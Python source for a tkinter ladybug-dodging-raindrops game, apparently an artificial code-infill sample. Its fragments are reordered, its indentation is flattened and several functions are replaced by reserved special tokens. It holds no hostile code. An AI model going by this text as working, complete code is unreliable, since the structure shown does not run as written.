in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) for coconut in data.coconuts: if data.pauseDrops == False: coconut.onTimerFired(data) if data.beInvincible == False: hit(data) if data.start != None: if abs(data.start - data.cy) >= 120: data.pauseDrops, data.beInvincible = False, False def levelCreatedRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_line(0, 20, data.width, 20) for coconut in data.coconuts: coconut.draw(canvas) if data.powerUpsEditor == True: drawPowerups(canvas, data) canvas.create_image(data.cx, data.cy, image=data.ladyBug) canvas.create_text(data.width / 6, 100, text='Total Lives: %d' % data. levelEditorLives, font='Arial 20 bold', fill='yellow') canvas.create_text(data.width / 2, 660, text= """You lose a life for hitting a drop & don't get eaten!""", font='Arial 15 bold', fill='yellow') if data.levelEditorLives <= 0: canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. deadScreen) canvas.create_text(data.width / 2, data.height / 4, text= 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold', fill='yellow') if data.level > 1: winEditor(canvas, data) drawHome(canvas, data) def winEditor(canvas, data): canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text='You Made it!', font= 'Arial 23 bold', fill='yellow') <|reserved_special_token_0|> def difficultyMousePressed(event, data): checkHome(event, data) if data.easyY - data.r <= event.y <= data.easyY + data.r: if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r: data.difficulty = data.difS data.slow = data.click data.medium, data.fast = data.notClick, data.notClick if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.difficulty = data.difM data.medium = data.click data.slow, data.fast = data.notClick, data.notClick if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r: data.difficulty = data.difH data.fast = data.click data.slow, data.medium = data.notClick, data.notClick if data.enter == data.click: if data.enterY - data.r <= event.y <= data.enterY + data.r: if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.mode = 'AI' def difficultyTimerFired(data): data.editorTime += 1 if data.editorTime % 2 == 0: rainDrop(data) for drop in data.editorDrops: drop.onTimerFired(data) def rainDrop(data): xPosition = random.randint(0, data.width) data.editorDrops.append(Coconuts(xPosition, 0)) def difficultyRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_image(data.width / 2, data.height / 2, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) drawDifficulties(canvas, data) drawHome(canvas, data) def hitAI1(data, distance): for coconut in data.coconutsAI1: if (data.player1Y - data.r - coconut.y <= distance and data. switchOnProgress == False): if (coconut.x >= data.player1X - data.r and coconut.x <= data. player1X + data.r or AISwitchBug(data, distance) == True): testInt = random.randint(0, 9) if testInt <= data.difficulty: data.switchOnProgress = True if data.player1X == 150: data.player1X = 340 else: data.player1X = 150 data.switchOnProgress = False if (coconut.y >= data.player1Y - data.r and coconut.y <= data. player1Y + data.r): if (coconut.x >= data.player1X - data.r and coconut.x <= data. player1X + data.r): data.player1Y += 50 data.coconutsAI1.remove(coconut) def AISwitchBug(data, distance): for scaryBug in data.scaryBug: if (data.player1Y - data.r - scaryBug.y <= distance and data. switchOnProgress == False): if (scaryBug.x >= data.player1X - data.r and scaryBug.x <= data .player1X + data.r): return True def hitAI2(data, distance): for coconut in data.coconutsAI2: if (coconut.y >= data.player2Y - data.r and coconut.y <= data. player2Y + data.r): if (coconut.x >= data.player2X - data.r and coconut.x <= data. player2X + data.r): data.player2Y += 50 data.coconutsAI2.remove(coconut) def coconutShotAI(data): if data.winner == None: if data.time % 15 == 0: xPosition1 = random.randint(0, 385) if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40: if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(xPosition1, 0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0)) if data.time % 8 == 0: xPosition2 = random.randint(0, 80) xPosition3 = random.randint(364, 385) if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(xPosition2, 0)) data.coconutsAI1.append(Coconuts(xPosition3, 0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0)) data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0)) addExtraCoconut(data) addPowerUpsAI(data) <|reserved_special_token_0|> def addPowerUpsAI(data): if data.time % 33 == 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.invincible.append(Invincible(140, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(550, 0)) elif side == 'r': if data.pause1Drop != True: data.invincible.append(Invincible(344, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(755, 0)) if data.time % 66 == 0: side = random.choice(data.sides) if side == 'l': data.scaryBug.append(ScaryBug(140, 750)) data.scaryBug.append(ScaryBug(550, 750)) elif side == 'r': data.scaryBug.append(ScaryBug(344, 750)) data.scaryBug.append(ScaryBug(750, 750)) <|reserved_special_token_0|> def AITimerFired(data): if data.winner == None: if data.Invincible1 == False: hitAI1(data, 31) if data.Invincible2 == True: pass elif data.Invincible2 == False: hitAI2(data, 31) for coconut in data.coconutsAI1: if data.pause1Drop == False: coconut.onTimerFired(data) for coconut in data.coconutsAI2: if data.pause2Drop == False: coconut.onTimerFired(data) if data.Invincible1 == False: hitAI1(data, 13) if data.Invincible2 == True: pass elif data.Invincible2 == False: hitAI2(data, 13) data.player1Y -= data.speedAI if data.player1Y < 15 and data.player2Y > 15: data.winner = 'player1' if data.player1Y > 40: data.time += 1 coconutShotAI(data) data.player2Y -= data.speedAI if data.player2Y < 15 and data.player1Y > 15: data.winner = 'player2' if data.player2Y > 40: data.time += 1 coconutShotAI(data) if data.player1Y < 15 and data.player2Y < 15: data.winner = 'tie' for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) powerUpAITimerFired(data) def powerUpAITimerFired(data): for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) if data.start1 != None: if abs(data.start1 - data.player1Y) >= 120: data.pause1Drop = False data.Invincible1 = False if data.start2 != None: if abs(data.start2 - data.player2Y) >= 120: data.pause2Drop = False data.Invincible2 = False def AIRedrawAll(canvas, data): canvas.create_image(data.width / 4, data.height / 2, image=data. halfBackground) canvas.create_image(3 * data.width / 4, data.height / 2, image=data. halfBackground) canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10 ) canvas.create_line(0, 20, data.width, 20) for coconut in data.coconutsAI1: coconut.draw(canvas) for coconut in data.coconutsAI2: coconut.draw(canvas) canvas.create_text(50, 40, text='Computer', font='Arial 15 bold', fill= 'yellow') canvas.create_text(450, 40, text='Player 1', font='Arial 15 bold', fill ='yellow') drawPowerups(canvas, data) canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug) canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug) AIWinner(canvas, data) drawHome(canvas, data) def AIWinner(canvas, data): if data.winner == 'player1': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text='The Computer Won :(', font='Arial 23 bold', fill='yellow') elif data.winner == 'player2': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'You Made it! You Won!', font='Arial 23 bold', fill='yellow') elif data.winner == 'tie': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow') def scoreboardKeyPressed(event, data): if event.keysym == 'r': init(data) def scoreboardMousePressed(event, data): checkHome(event, data) def scoreboardTimerFired(data): difficultyTimerFired(data) def scoreboardRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_image(data.width / 2, data.tbgY, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!', font='Arial 30 bold', fill='yellow') canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font= 'Arial 20 bold', fill='yellow') drawHome(canvas, data) data.savedScores data.savedScores = readFile('score.txt') score = data.savedScores.splitlines() scores = [] for line in score: scores.append(line.split(',')) scores = sorted(scores, key=lambda x: int(x[0])) top5 = scores[-data.numScores:] top5.reverse() for i in range(len(top5)): canvas.create_text(data.width / 2, data.scoreShift + i * 50, text= top5[i], font='Arial 18 bold', fill='yellow') def helpKeyPressed(event, data): if event.keysym == 'r': init(data) <|reserved_special_token_0|> def helpRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen) for drop in data.editorDrops: drop.draw(canvas) drawHome(canvas, data) def run(width=15000, height=25000): def redrawAllWrapper(canvas, data): canvas.delete(ALL) redrawAll(canvas, data) canvas.update() def mousePressedWrapper(event, canvas, data): mousePressed(event, data) redrawAllWrapper(canvas, data) def keyPressedWrapper(event, canvas, data): keyPressed(event, data) redrawAllWrapper(canvas, data) def timerFiredWrapper(canvas, data): timerFired(data) redrawAllWrapper(canvas, data) canvas.after(data.timerDelay, timerFiredWrapper, canvas, data) class Struct(object): pass data = Struct() data.width = width data.height = height data.timerDelay = 100 root = Tk() init(data) canvas = Canvas(root, width=data.width, height=data.height) canvas.pack() root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas, data)) root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data)) timerFiredWrapper(canvas, data) root.mainloop() print('bye!') <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def init(data): data.score = 0 data.mode = 'splashScreen' data.timerDelay = 100 data.height = 800 data.width = 800 data.speed = 10 data.speedAI = 12 data.speedAI2 = 12 data.switchOnProgress = False data.r = 25 data.cx = 280 data.cy = 750 data.onLeft1, data.onLeft2 = True, True data.win = False data.coconuts = [] data.powerUps = [] data.coconuts1 = [] data.coconuts2 = [] data.coconutsAI1 = [] data.coconutsAI2 = [] data.invincible = [] data.pauseDrops = False data.pause1Drop = False data.pause2Drop = False init1(data) def init1(data): data.beInvincible = False data.Invincible1 = False data.Invincible2 = False data.scaryBug = [] data.time = 0 data.coconutFall = False data.sides = ['r', 'l'] data.level = 1 data.splashScreenTime = 0 data.splashScreenDrops = [] data.background = PhotoImage(file='tree.gif') data.deadScreen = PhotoImage(file='deadBug.gif') data.ladyBug = PhotoImage(file='lady.gif') data.winScreen = PhotoImage(file='treeTop1.gif') data.winBug = PhotoImage(file='littleBug.gif') data.halfBackground = PhotoImage(file='halfTree.gif') data.umbrella = PhotoImage(file='umbrella2.gif') data.spider = PhotoImage(file='spider.gif') data.hourGlass = PhotoImage(file='hourGlass.gif') data.splashScreen = PhotoImage(file='splash.gif') init2(data) def init2(data): data.tbg = PhotoImage(file='tbg2.gif') data.click = PhotoImage(file='click.gif') data.notClick = PhotoImage(file='notClick.gif') data.player1X = 150 data.player1Y = 750 data.player2X = 550 data.player2Y = 750 data.winner = None data.speed = 12 data.speed2 = 12 data.editorTime = 0 data.editorDrops = [] data.margin = 100 data.enter = False data.powerUpsEditor = None data.yourSpeed = None data.rainSpeed = None data.slow = data.notClick data.medium = data.notClick data.fast = data.notClick data.drizzle = data.notClick data.rain = data.notClick data.thunderstorm = data.notClick init3(data) def init3(data): data.yes = data.notClick data.no = data.notClick data.enter = data.notClick data.levelEditorLives = 2 data.rSpeed = None data.start = None data.start1 = None data.start2 = None data.difficulty = None data.mode1 = data.notClick data.mode2 = data.notClick data.mode3 = data.notClick data.mode4 = data.notClick data.mode5 = data.notClick data.mode6 = data.notClick data.home = PhotoImage(file='home.gif') data.helpScreen = PhotoImage(file='help1.gif') data.title = PhotoImage(file='title.gif') data.scoreList = [] data.spotList = [270, 364, 458, 552, 646, 740] data.savedScores = readFile('score.txt') if data.mode == 'levelCreated': setEverything(data) initsplashScreenNumbers(data) def initsplashScreenNumbers(data): data.splashButtonY = 425 data.p1ButtonX = 225 data.p2ButtonX = 290 data.edButton = 355 data.diffButton = 425 data.helpButton = 490 data.sboardButton = 555 data.hitPenalty = 75 data.splashText = data.height / 2 - 20 data.lives = 2 data.levelMax = 8 data.lane = 94 data.Player1Min = 270 data.Player1Max = 740 data.homeX = 50 data.homeY = 650 initScoreBoardHelp(data) init1Player(data) def initScoreBoardHelp(data): data.tbgY = 5 * data.height / 12 data.txtTScore = 150 data.S_P = 220 data.numScores = 5 data.scorePos = data.height / 10 data.scoreShift = 270 data.helpY = data.height / 2 - 20 data.name = '' data.printName = '' data.hit = False initAI(data) def init1Player(data): data.buffer = 40 def initAI(data): data.AITY = 225 data.easyX = 200 data.easyY = 300 data.medX = 400 data.hardX = 600 data.enterY = 450 data.difS = 4 data.difM = 6 data.difH = 8 data.last = 500 data.enterX = 575 data.PUT = 450 data.RST = 350 data.YST = 250 def mousePressed(event, data): if data.mode == 'splashScreen': splashScreenMousePressed(event, data) elif data.mode == '1Player': playerMousePressed(event, data) elif data.mode == '2Player': twoPlayerMousePressed(event, data) elif data.mode == 'editor': editorMousePressed(event, data) elif data.mode == 'levelCreated': levelCreatedMousePressed(event, data) elif data.mode == 'AI': AIMousePressed(event, data) elif data.mode == 'difficulty': difficultyMousePressed(event, data) elif data.mode == 'scoreboard': scoreboardMousePressed(event, data) elif data.mode == 'help': helpMousePressed(event, data) def keyPressed(event, data): if data.mode == 'splashScreen': splashKeyPressed(event, data) elif data.mode == '1Player': playerKeyPressed(event, data) elif data.mode == '2Player': twoPlayerKeyPressed(event, data) elif data.mode == 'editor': editorKeyPressed(event, data) elif data.mode == 'levelCreated': levelCreatedKeyPressed(event, data) elif data.mode == 'AI': AIKeyPressed(event, data) elif data.mode == 'difficulty': difficultyKeyPressed(event, data) elif data.mode == 'scoreboard': scoreboardKeyPressed(event, data) elif data.mode == 'help': helpKeyPressed(event, data) def timerFired(data): if data.mode == 'splashScreen': splashScreenTimerFired(data) elif data.mode == '1Player': playerTimerFired(data) elif data.mode == '2Player': twoPlayerTimerFired(data) elif data.mode == 'editor': editorTimerFired(data) elif data.mode == 'levelCreated': levelCreatedTimerFired(data) elif data.mode == 'AI': AITimerFired(data) elif data.mode == 'difficulty': difficultyTimerFired(data) elif data.mode == 'scoreboard': scoreboardTimerFired(data) elif data.mode == 'help': helpTimerFired(data) def redrawAll(canvas, data): if data.mode == 'splashScreen': splashScreenRedrawAll(canvas, data) elif data.mode == '1Player': playerRedrawAll(canvas, data) elif data.mode == '2Player': twoPlayerRedrawAll(canvas, data) elif data.mode == 'editor': editorRedrawAll(canvas, data) elif data.mode == 'levelCreated': levelCreatedRedrawAll(canvas, data) elif data.mode == 'AI': AIRedrawAll(canvas, data) elif data.mode == 'difficulty': difficultyRedrawAll(canvas, data) elif data.mode == 'scoreboard': scoreboardRedrawAll(canvas, data) elif data.mode == 'help': helpRedrawAll(canvas, data) def splashScreenMousePressed(event, data): if (data.splashButtonY - 2 * data.r <= event.x <= data.splashButtonY + 2 * data.r): if data.p1ButtonX - data.r <= event.y <= data.p1ButtonX + data.r: data.mode = '1Player' if data.p2ButtonX - data.r <= event.y <= data.p2ButtonX + data.r: data.mode = '2Player' if data.edButton - data.r <= event.y <= data.edButton + data.r: data.mode = 'editor' if data.diffButton - data.r <= event.y <= data.diffButton + data.r: data.mode = 'difficulty' if data.helpButton - data.r <= event.y <= data.helpButton + data.r: data.mode = 'help' if data.sboardButton - data.r <= event.y <= data.sboardButton + data.r: data.mode = 'scoreboard' def splashKeyPressed(event, data): pass def splashScreenTimerFired(data): data.splashScreenTime += 1 if data.splashScreenTime % 2 == 1: rainDropSplash(data) for drop in data.splashScreenDrops: drop.onTimerFired(data) def splashScreenButtons(canvas, data): canvas.create_image(data.splashButtonY, data.p1ButtonX, image=data.mode1) canvas.create_image(data.splashButtonY, data.p2ButtonX, image=data.mode2) canvas.create_image(data.splashButtonY, data.edButton, image=data.mode3) canvas.create_image(data.splashButtonY, data.diffButton, image=data.mode4) canvas.create_image(data.splashButtonY, data.helpButton, image=data.mode5) canvas.create_image(data.splashButtonY, data.sboardButton, image=data.mode6 ) def rainDropSplash(data): xPosition = random.randint(0, 800) data.splashScreenDrops.append(Coconuts(xPosition, 0)) def splashScreenRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.splashText - 10, image=data.title) for drop in data.splashScreenDrops: drop.draw(canvas) canvas.create_text(data.width / 2, data.splashText, text= """ 1.) Single Player Level Mode 2.) Two-Player Mode 3.) Level Creator Practice Mode 4.) Play Against the Computer 5.) Help and Instructions 6.) Scoreboard """ , font='Arial 14 bold', fill='yellow') splashScreenButtons(canvas, data) def writeFile(path, contents): with open(path, 'wt') as f: f.write(contents) def readFile(path): with open(path, 'rt') as f: return f.read() class Coconuts(object): def __init__(self, x, y): self.x = x self.y = y self.r = 9 self.fill = 'deep sky blue' self.speed = 30 self.outline = 'blue' def draw(self, canvas): canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r, self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill= self.fill, outline=self.outline, width=3) def onTimerFired(self, data): self.y += self.speed def hit(data): for coconut in data.coconuts: if data.mode == '1Player' or data.mode == 'levelCreated': if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r: if (coconut.x >= data.cx - data.r and coconut.x <= data.cx + data.r): data.cy += data.hitPenalty if data.mode == 'levelCreated': data.lives -= 1 elif data.hit == False and data.level < data.levelMax: data.score -= data.level data.coconuts.remove(coconut) if data.mode == 'levelCreated': data.levelEditorLives -= 1 def hit2Player(data): if data.mode == '2Player': if data.Invincible1 == False: for coconut in data.coconuts1: if (coconut.y >= data.player1Y - data.r and coconut.y <= data.player1Y + data.r): if (coconut.x >= data.player1X - data.r and coconut.x <= data.player1X + data.r): data.player1Y += data.hitPenalty data.coconuts1.remove(coconut) if data.Invincible2 == False: for coconut in data.coconuts2: if (coconut.y >= data.player2Y - data.r and coconut.y <= data.player2Y + data.r): if (coconut.x >= data.player2X - data.r and coconut.x <= data.player2X + data.r): data.player2Y += data.hitPenalty data.coconuts2.remove(coconut) class PowerUps(Coconuts): def __init__(self, x, y): super().__init__(x, y) def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.hourGlass) def hitPause(data): for powerUp in data.powerUps: if data.mode == '1Player' or data.mode == 'levelCreated': if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r: if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx + data.r): data.pauseDrops = True data.start = data.cy data.powerUps.remove(powerUp) elif data.mode == '2Player' or data.mode == 'AI': if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data. player1Y + data.r): if (powerUp.x >= data.player1X - data.r and powerUp.x <= data.player1X + data.r): data.pause1Drop = True data.start1 = data.player1Y data.powerUps.remove(powerUp) if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data. player2Y + data.r): if (powerUp.x >= data.player2X - data.r and powerUp.x <= data.player2X + data.r): data.pause2Drop = True data.start2 = data.player2Y data.powerUps.remove(powerUp) class Invincible(PowerUps): def __init__(self, x, y): super().__init__(x, y) def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.umbrella) def hitInvincible(data): for powerUp in data.invincible: if data.mode == '1Player' or data.mode == 'levelCreated': if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r: if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx + data.r): data.beInvincible = True data.start = data.cy data.invincible.remove(powerUp) if data.mode == '2Player' or data.mode == 'AI': if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data. player1Y + data.r): if (powerUp.x >= data.player1X - data.r and powerUp.x <= data.player1X + data.r): data.Invincible1 = True data.start1 = data.player1Y data.invincible.remove(powerUp) if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data. player2Y + data.r): if (powerUp.x >= data.player2X - data.r and powerUp.x <= data.player2X + data.r): data.Invincible2 = True data.start2 = data.player2Y data.invincible.remove(powerUp) class ScaryBug(object): def __init__(self, x, y): self.x = x self.y = y self.speed = 25 def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.spider) def onTimerFired(self, data): if data.mode == '2Player' or data.mode == 'AI': self.speed = 35 self.y -= self.speed if (data.mode == '1Player' or data.mode == 'levelCreated' and data. time % 8 == 0): side = random.choice(data.sides) if side == 'l': if self.x - data.lane >= data.Player1Min: self.x -= data.lane else: self.x += data.lane elif side == 'r': if self.x + data.lane <= data.Player1Max: self.x += data.lane else: self.x -= data.lane def hitScaryBug(data): for bug in data.scaryBug: if data.mode == '1Player' or data.mode == 'levelCreated': if (bug.y >= data.cy - 1.5 * data.r and bug.y <= data.cy + 1.5 * data.r): if (bug.x >= data.cx - 1.5 * data.r and bug.x <= data.cx + 1.5 * data.r): data.hit = True data.lives = 0 data.levelEditorLives = 0 if data.mode == '2Player' or data.mode == 'AI': if (bug.y >= data.player1Y - data.r and bug.y <= data.player1Y + data.r): if (bug.x >= data.player1X - data.r and bug.x <= data. player1X + data.r): data.winner = 'player2' if (bug.y >= data.player2Y - data.r and bug.y <= data.player2Y + data.r): if (bug.x >= data.player2X - data.r and bug.x <= data. player2X + data.r): data.winner = 'player1' def drawPowerups(canvas, data): for bug in data.scaryBug: bug.draw(canvas, data) for powerUp in data.powerUps: powerUp.draw(canvas, data) for powerUp in data.invincible: powerUp.draw(canvas, data) def drawHome(canvas, data): canvas.create_image(data.homeX, data.homeY, image=data.home) def checkHome(event, data): if data.homeY - data.r <= event.y <= data.homeY + data.r: if data.homeX - data.r <= event.x <= data.homeX + data.r: init(data) def coconutShot(data): if data.level > 0 and data.pauseDrops == False: if data.time % int(data.levelMax / data.level ) == 0 or data.time % 6 == 0: xPosition1 = random.randint(0, data.Player1Min - data.buffer) xPosition2 = random.randint(data.Player1Max + data.buffer, data .width + data.buffer) data.coconuts.append(Coconuts(xPosition1, 0)) data.coconuts.append(Coconuts(xPosition2, 0)) xPosition4 = random.randint(data.Player1Min - data.buffer, data .Player1Max + data.buffer) data.coconuts.append(Coconuts(xPosition4, 0)) if data.time % 5 == 0: xPosition3 = random.randint(0, data.Player1Min - data.buffer) data.coconuts.append(Coconuts(xPosition3, 0)) if data.time % int(24 / data.level) == 0: side = random.choice(data.sides) if side == 'l': data.coconuts.append(Coconuts(data.Player1Min, 0)) elif side == 'r': data.coconuts.append(Coconuts(data.Player1Max, 0)) powerUpCoconutShot(data) def powerUpCoconutShot(data): if data.time % 60 == 0 and data.time % 120 != 0: Position = random.choice(data.spotList) data.powerUps.append(PowerUps(Position, 0)) if data.time % 50 == 0: Position = random.choice(data.spotList) data.invincible.append(Invincible(Position, 0)) if data.time % 100 == 0: Position = random.choice(data.spotList) data.scaryBug.append(ScaryBug(Position, 750)) def playerKeyPressed(event, data): if data.level < data.levelMax and event.keysym == 'r': init(data) if event.keysym == 'Left' and data.cx >= data.Player1Min + data.lane / 2: data.cx -= data.lane / 2 elif event.keysym == 'Right' and data.cx <= data.Player1Max: data.cx += data.lane / 2 if data.level >= data.levelMax: if len(event.keysym) == 1: if len(data.name) < 15: data.name += event.keysym if event.keysym == 'BackSpace': data.name = data.name[0:-1] if event.keysym == 'Return': data.scoreList += data.score, data.name writeFile('score.txt', data.savedScores + str(data.score) + ',' + data.name + '\n') data.mode = 'scoreboard' <|reserved_special_token_0|> def playerRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_line(0, 20, data.width, 20) for coconut in data.coconuts: coconut.draw(canvas) drawPowerups(canvas, data) canvas.create_image(data.cx, data.cy, image=data.ladyBug) canvas.create_text(data.width / 6, 50, text='Level: %d' % data.level, font='Arial 18 bold', fill='yellow') canvas.create_text(data.width / 6, 80, text='Score: %d' % data.score, font='Arial 18 bold', fill='yellow') canvas.create_text(2 * data.width / 3, 660, text= """The greater the level, the more points get added to your score!""" , font='Arial 15 bold', fill='yellow') if data.hit == True: canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. deadScreen) canvas.create_text(data.width / 2, data.height / 4, text= 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold', fill='yellow') canvas.create_text(data.width / 2, 280, text='Score: %d' % data. score, font='Arial 13 bold', fill='yellow') if data.level >= 8: madeIt(canvas, data) drawHome(canvas, data) def madeIt(canvas, data): canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 70, text='You Made it!', font= 'Arial 23 bold', fill='yellow') canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score, font='Arial 15 bold', fill='yellow') canvas.create_text(data.width / 2, 375, text= 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow') canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, 450, fill='white') canvas.create_text(data.width / 2, 425, text=data.name) def drop2Player(data): if data.winner == None and data.pauseDrops == False: if data.time % 15 == 0: xPosition1 = random.randint(0, 385) if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25: if data.pause1Drop != True: data.coconuts1.append(Coconuts(xPosition1, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(xPosition1 + 410, 0)) if data.time % 12 == 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.coconuts1.append(Coconuts(140, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(540, 0)) elif side == 'r': if data.pause1Drop != True: data.coconuts1.append(Coconuts(344, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(755, 0)) powerupDrop2Player(data) def powerupDrop2Player(data): if data.time % 45 == 0 and data.time % 90 != 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.powerUps.append(PowerUps(140, 0)) if data.pause2Drop != True: data.powerUps.append(PowerUps(540, 0)) elif side == 'r': if data.pause1Drop != True: data.powerUps.append(PowerUps(344, 0)) if data.pause2Drop != True: data.powerUps.append(PowerUps(755, 0)) if data.time % 60 == 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.invincible.append(Invincible(140, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(540, 0)) elif side == 'r': if data.pause1Drop != True: data.invincible.append(Invincible(344, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(755, 0)) if data.time % 90 == 0: side = random.choice(data.sides) if side == 'l': data.scaryBug.append(ScaryBug(140, 750)) data.scaryBug.append(ScaryBug(540, 750)) elif side == 'r': data.scaryBug.append(ScaryBug(344, 750)) data.scaryBug.append(ScaryBug(755, 750)) def twoPlayerKeyPressed(event, data): if event.keysym == 'r': init(data) if data.winner == None: if event.keysym == 'a' and data.onLeft1 == False: data.onLeft1 = True data.player1X = 150 if event.keysym == 'd' and data.onLeft1 == True: data.onLeft1 = False data.player1X = 330 if event.keysym == 'Left' and data.onLeft2 == False: data.onLeft2 = True data.player2X = 550 if event.keysym == 'Right' and data.onLeft2 == True: data.onLeft2 = False data.player2X = 750 def twoPlayerMousePressed(event, data): checkHome(event, data) def twoPlayerTimerFired(data): if data.winner == None: data.player1Y -= data.speed if data.player1Y < 15 and data.player2Y > 15: data.winner = 'player1' if data.player1Y > 40: data.time += 1 drop2Player(data) data.player2Y -= data.speed if data.player2Y < 15 and data.player1Y > 15: data.winner = 'player2' if data.player2Y > 40: data.time += 1 drop2Player(data) if data.player1Y < 15 and data.player2Y < 15: data.winner = 'tie' for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) powerupTimerFired(data) def powerupTimerFired(data): for coconut in data.coconuts1: if data.pause1Drop == False: coconut.onTimerFired(data) hit2Player(data) for coconut in data.coconuts2: if data.pause2Drop == False: coconut.onTimerFired(data) if data.start1 != None: if abs(data.start1 - data.player1Y) >= 120: data.pause1Drop = False data.Invincible1 = False if data.start2 != None: if abs(data.start2 - data.player2Y) >= 120: data.pause2Drop = False data.Invincible2 = False def twoPlayerRedrawAll(canvas, data): canvas.create_image(data.width / 4, data.height / 2, image=data. halfBackground) canvas.create_image(3 * data.width / 4, data.height / 2, image=data. halfBackground) canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10 ) canvas.create_line(0, 20, data.width, 20) for coconut in data.coconuts1: coconut.draw(canvas) for coconut in data.coconuts2: coconut.draw(canvas) drawPowerups(canvas, data) canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug) canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug) canvas.create_text(50, 40, text='Player 1', font='Arial 15 bold', fill= 'yellow') canvas.create_text(450, 40, text='Player 2', font='Arial 15 bold', fill ='yellow') winner(canvas, data) drawHome(canvas, data) def winner(canvas, data): if data.winner == 'player1': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'You Made it! Player 1', font='Arial 23 bold', fill='yellow') elif data.winner == 'player2': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'You Made it! Player 2', font='Arial 23 bold', fill='yellow') elif data.winner == 'tie': 